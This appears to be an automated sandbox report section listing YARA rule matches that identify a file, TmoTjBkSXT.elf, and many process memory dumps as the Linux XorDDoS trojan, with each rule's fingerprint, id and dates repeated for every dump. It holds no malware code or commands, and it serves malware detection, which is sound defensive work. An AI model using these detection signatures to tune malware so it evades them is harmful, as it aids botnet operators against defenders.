Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown

Source: ELF static info symbol of initial sample

.symtab present: no

Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
